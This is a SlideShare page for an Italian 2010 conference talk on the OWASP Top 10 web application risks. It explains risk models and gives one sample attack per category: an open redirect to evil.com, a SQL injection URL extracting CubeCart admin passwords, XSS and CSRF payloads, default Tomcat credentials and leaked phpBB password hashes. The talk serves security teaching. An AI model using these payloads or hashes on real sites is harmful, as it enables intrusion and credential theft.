Roma, Sabato 23 ottobre 2010
Web Application Security:
OWASP TOP 10 2010 tra
rischi, attacchi e difese
http://www.siatec.net/
Tendenze
Quali sono le ultime tendenze
nella sicurezza, nel 2010
IBM X-Force Threat Report
“For the first time web
application
vulnerabilities have
reached 50 per cent of
all code flaws r...
IBM X-Force Threat Report
WebApp
55.95%
Altre
44.05%
Percentuale delle vulnerabilità scoperte che interessano Applicazioni...
IBM X-Force Threat Report
0
5000
10000
15000
20000
25000
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010
...
…ma la TOP 10 non è
sulle vulnerabilità…
…è sui rischi…
…ma cos’è il rischio!?
Rischi e Vulnerabilità Il modello di definizione del
rischio secondo OWASP
ISO IEC Guide 73
“rischio: la
combinazione della
probabilità di un
evento e le sue
conseguenze”
Renzo Dell’Agnello
“Il rischio è la
possibilità di avere
un danno”
Probabilità ImpattoRischio
il rischio
Alessandro Sinibaldi
“...deriva dalla
combinazione di un
pericolo (threat) e di
una vulnerabilità”
Minaccia VulnerabilitàProbabilità
Minaccia
Pericolo
Agenti di
minaccia
Attaccanti
Gruppi di
attaccanti
Gruppo di
attacco
Threat
Agent
competenze
necessarie per
compiere l’attacco
motivazione
ad attaccare
opportunità
di attacco
dimensione
del gruppo degli
attaccanti
Vulnerabilità
Fattori legati
alla
Vulnerabilità
Vulnerability
facilità di
individuabilità
facilità di
sfruttamento
consapevolzza
dell’esistenza
quanto è facile da
individuare
un’intrusione?
Michele Cecioni
“il rischio dipende
anche dall'entità del
danno"
Impatto
tecnico
Impatto
sul
Business
Impatto
Impatto
tecnico
Technical
Impact
perdita di
riservatezza
perdita di
integrità
perdita di
disponibilità
perdita di
responsabilità
Impatto sul
Business
Impatto sulla
“missione”
Impatto sulla
missione
dell’organizzazione
Business
Impact
danno
finanziario
danno alla
reputazione
non conformità
violazione della privacy
Agente di
Attacco
Competenza
Motivazione
Opportunità
Dimensioni
Vulnerabilità
Facilità di
Individuabilità
Facilità di
sfru...
…e le applicazioni
web?
Beni
dell’organizzazione
dove impattano gli
attacchi
Stack Applicativo
Vulnerabilità
Agente
di minaccia
scenario
Agente
di...
…stack applicativo?
Lo stack applicativo
Codice Applicativo
Interprete
Web Server
Database
Applicazioni
Sistema Operativo
Rete
OWASP TOP 10 2010
Quali sono le tendenze tra
vulnerabilità e rischi nel 2010
http://www.example.com/index.php?opt
ion=cookiecheck&return=http://www.ev
il.com/
Joomla <= 1.5
A10: Unvalidated
Redirects and
Forwards
40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:
34:b1:84:97:06:6f:
f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:
2d:e9:49:60:93:12:
0d:9f:05:8...
A9: Insufficient
Transport Layer
Protection
print
print "Target = http://" + blogURL +
"/?p=" + str(postID)
print
while 1:
# Start non authenticated enumeration
reque...
A8: Failure to
Restrict URL Access
captcha-commits@lists.phpbb.com 54a946c47dd434b2
catdb-commits@lists.phpbb.com 6f543db8f086e11f
convertors-commits@lists.p...
A7: Insecure
Cryptographic
Storage
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="t...
A6: Security
Misconfiguration
<img src="http://www.example.com/s
aurus/admin/change_config.php?grou
p=1&site_name=hacked&slogan=hacked
&meta_title=hacke...
A5: Cross-Site
Request Forgery
(CSRF)
POST
/?m=Profile&func=get_raw_blog_entr
y&user_id=<user_id>&ajax=1&store=0
&aja
x_target=none
HTTP/1.1
Host: wwwb21.tuenti...
A4: Insecure Direct
Object References
POST /CubeCart-
latest/admin.php?_g=maintenance/ba
ckup HTTP/1.1
Host: bld02
Content-Type: multipart/form-data;
boundary=-...
A3: Broken
Authentication and
Session
Management
http://www.targetsite.net/
index.php?catid=1>'><Script%
20%0d%0a>Alert
XSS(406115679152)%3B</Scrip>
Cag's CMS
A2: Cross-Site
Scripting (XSS)
http://www.example.com/cart
/index.php?cat_id=19+union+s
elect+group_concat%28usernam
e,0x3a,password%29,2,3,4,5,6
,7,8+fr...
A1: Injection
…
GET
/etc/passwd?format=%%&xss=">
<script>alert('xss');</scrip
t>&traversal=../../&sql='%20
OR%201;
…tratto da un vero TRACE
Conclusioni Domande e Riferimenti
Riferimenti
IBM X-Force: http://xforce.iss.net/
OWASP Testing Guide: http://www.owasp.org/index.php/OWASP_Testing_Project
...
Grazie
Simone Onofri
simone.onofri@techub.it
http://www.techub.it
Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese
Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese
Upcoming SlideShare
Loading in …5
×

Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese

2,432 views

Published on

"For the first time web application vulnerabilities have reached 50 per cent of all code flaws reported" - IBM X-Force Threat Report

L'X-force Threats Report ogni sei mesi riporta i trend dell’IT Security. Nell’edizione di Agosto 2010, oltre al Phishing e all’exploiting dei PDF, conferma che il 50% delle vulnerabilità si trova nelle applicazioni web. Che l’applicazione sia open source o closed source, creata da uno sviluppatore freelance o da una azienda di una qualsiasi dimensione, bisogna considerare tutti i fattori di rischio e impatto in caso di compromissione e conoscere i metodi più pratici ed economici per risolvere o mitigare le vulnerabilità.

Durante il talk, dopo una breve introduzione sulla sicurezza delle applicazioni web, vedremo - con alcuni esempi pratici e in maniera semplice - come attaccare, come difendersi e quali sono i rischi che corriamo con i 10 rischi più frequenti nel 2010 secondo l’OWASP: dalle Injection (di SQL o LDAP...) ai Redirect, passando per le XSS e CSRF e molto altro.

Published in: Technology, Economy & Finance
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,432
On SlideShare
0
From Embeds
0
Number of Embeds
10
Actions
Shares
0
Downloads
0
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese

  1. 1. Roma, Sabato 23 ottobre 2010 Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese
  2. 2. http://www.siatec.net/
  3. 3. Tendenze Quali sono le ultime tendenze nella sicurezza, nel 2010
  4. 4. IBM X-Force Threat Report “For the first time web application vulnerabilities have reached 50 per cent of all code flaws reported”
  5. 5. IBM X-Force Threat Report WebApp 55.95% Altre 44.05% Percentuale delle vulnerabilità scoperte che interessano Applicazioni Web
  6. 6. IBM X-Force Threat Report 0 5000 10000 15000 20000 25000 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 Conteggio cumulativo delle segnalazioni rispetto le Applicazioni Web
  7. 7. …ma la TOP 10 non è sulle vulnerabilità…
  8. 8. …è sui rischi…
  9. 9. …ma cos’è il rischio!?
  10. 10. Rischi e Vulnerabilità Il modello di definizione del rischio secondo OWASP
  11. 11. ISO IEC Guide 73 “rischio: la combinazione della probabilità di un evento e le sue conseguenze”
  12. 12. Renzo Dell’Agnello “Il rischio è la possibilità di avere un danno”
  13. 13. Probabilità ImpattoRischio il rischio
  14. 14. Alessandro Sinibaldi “...deriva dalla combinazione di un pericolo (threat) e di una vulnerabilità”
  15. 15. Minaccia VulnerabilitàProbabilità
  16. 16. Minaccia
  17. 17. Pericolo
  18. 18. Agenti di minaccia
  19. 19. Attaccanti
  20. 20. Gruppi di attaccanti
  21. 21. Gruppo di attacco
  22. 22. Threat Agent
  23. 23. competenze necessarie per compiere l’attacco
  24. 24. motivazione ad attaccare
  25. 25. opportunità di attacco
  26. 26. dimensione del gruppo degli attaccanti
  27. 27. Vulnerabilità
  28. 28. Fattori legati alla Vulnerabilità
  29. 29. Vulnerability
  30. 30. facilità di individuabilità
  31. 31. facilità di sfruttamento
  32. 32. consapevolzza dell’esistenza
  33. 33. quanto è facile da individuare un’intrusione?
  34. 34. Michele Cecioni “il rischio dipende anche dall'entità del danno"
  35. 35. Impatto tecnico Impatto sul Business Impatto
  36. 36. Impatto tecnico
  37. 37. Technical Impact
  38. 38. perdita di riservatezza
  39. 39. perdita di integrità
  40. 40. perdita di disponibilità
  41. 41. perdita di responsabilità
  42. 42. Impatto sul Business
  43. 43. Impatto sulla “missione”
  44. 44. Impatto sulla missione dell’organizzazione
  45. 45. Business Impact
  46. 46. danno finanziario
  47. 47. danno alla reputazione
  48. 48. non conformità
  49. 49. violazione della privacy
  50. 50. Agente di Attacco Competenza Motivazione Opportunità Dimensioni Vulnerabilità Facilità di Individuabilità Facilità di sfruttamento Conoscenza della vulnerabilità Intrusion detection Impatto tecnico Perdita di riservatezza Perdita di integrità Perdita di disponibilità Perdita di responsabilità Impatto sulla missione dell’organizzazione Danno finanziario Danno alla reputazione Non conformità Violazione della privacy Il quadro del rischio
  51. 51. …e le applicazioni web?
  52. 52. Beni dell’organizzazione dove impattano gli attacchi Stack Applicativo Vulnerabilità Agente di minaccia scenario Agente di minaccia Agente di minaccia
  53. 53. …stack applicativo?
  54. 54. Lo stack applicativo Codice Applicativo Interprete Web Server Database Applicazioni Sistema Operativo Rete
  55. 55. OWASP TOP 10 2010 Quali sono le tendenze tra vulnerabilità e rischi nel 2010
  56. 56. http://www.example.com/index.php?opt ion=cookiecheck&return=http://www.ev il.com/ Joomla <= 1.5
  57. 57. A10: Unvalidated Redirects and Forwards
  58. 58. 40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21: 34:b1:84:97:06:6f: f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d: 2d:e9:49:60:93:12: 0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0: 6e:e2:fe:e5:07:81: 82:fc Here is the list of available SSLv2 ciphers: RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP- RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5 RC4-64-MD5 SSLv2
  59. 59. A9: Insufficient Transport Layer Protection
  60. 60. print print "Target = http://" + blogURL + "/?p=" + str(postID) print while 1: # Start non authenticated enumeration request = '/?p=' + str(postID) conn.request("GET", request, "") WordPress >= 2.9
  61. 61. A8: Failure to Restrict URL Access
  62. 62. captcha-commits@lists.phpbb.com 54a946c47dd434b2 catdb-commits@lists.phpbb.com 6f543db8f086e11f convertors-commits@lists.phpbb.com c192b68baacc8842 documentation-commits@lists.phpbb.com f85ffcdf9262420c easymod-commits@lists.phpbb.com 5db5bf75be85191b kbase-commits@lists.phpbb.com 7c843188ed2f6021 modteam-commits@lists.phpbb.com 533aeefe56bfa30c prosilver-commits@lists.phpbb.com 859785a9cc724e03 website-commits@lists.phpbb.com 3c79b9864ae5ce43 phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4 st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8 packagemanager-commits@lists.phpbb.com 81657892dddafdca moddocs-commits@lists.phpbb.com 85c837b7f78e5435 phpBB hacked
  63. 63. A7: Insecure Cryptographic Storage
  64. 64. <?xml version='1.0' encoding='utf-8'?> <tomcat-users> <role rolename="tomcat"/> <role rolename="role1"/> <user username="tomcat" password="tomcat" roles="tomcat"/> <user username="both" password="tomcat" roles="tomcat,role1"/> <user username="role1" password="tomcat" roles="role1"/> </tomcat-users> Tomcat tomcat-users.xml
  65. 65. A6: Security Misconfiguration
  66. 66. <img src="http://www.example.com/s aurus/admin/change_config.php?grou p=1&site_name=hacked&slogan=hacked &meta_title=hacked&meta_descriptio n=hacked&meta_keywords=hacked&save =1&flt_keel=1&page_end_html=&timez one="> Saurus CMS Admin Panel
  67. 67. A5: Cross-Site Request Forgery (CSRF)
  68. 68. POST /?m=Profile&func=get_raw_blog_entr y&user_id=<user_id>&ajax=1&store=0 &aja x_target=none HTTP/1.1 Host: wwwb21.tuenti.com [...] blog_entry_id=<another_blog_entry_ id>&csfr=<token> Tuenti Social Network
  69. 69. A4: Insecure Direct Object References
  70. 70. POST /CubeCart- latest/admin.php?_g=maintenance/ba ckup HTTP/1.1 Host: bld02 Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryCpv+NVAHAgHHdvdI User-Agent: X_CLUSTER_CLIENT_IP: Cookie: ccAdmin=+ Accept: */*;q=0.5 Content-Length: 434 CubeCart 4
  71. 71. A3: Broken Authentication and Session Management
  72. 72. http://www.targetsite.net/ index.php?catid=1>'><Script% 20%0d%0a>Alert XSS(406115679152)%3B</Scrip> Cag's CMS
  73. 73. A2: Cross-Site Scripting (XSS)
  74. 74. http://www.example.com/cart /index.php?cat_id=19+union+s elect+group_concat%28usernam e,0x3a,password%29,2,3,4,5,6 ,7,8+from+cube305_CubeCart_a dmin_users— CubeCart 2.0.1
  75. 75. A1: Injection
  76. 76.
  77. 77. GET /etc/passwd?format=%%&xss="> <script>alert('xss');</scrip t>&traversal=../../&sql='%20 OR%201; …tratto da un vero TRACE
  78. 78. Conclusioni Domande e Riferimenti
  79. 79. Riferimenti IBM X-Force: http://xforce.iss.net/ OWASP Testing Guide: http://www.owasp.org/index.php/OWASP_Testing_Project OWASP TOP 10 2010: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
  80. 80. Grazie Simone Onofri simone.onofri@techub.it http://www.techub.it

×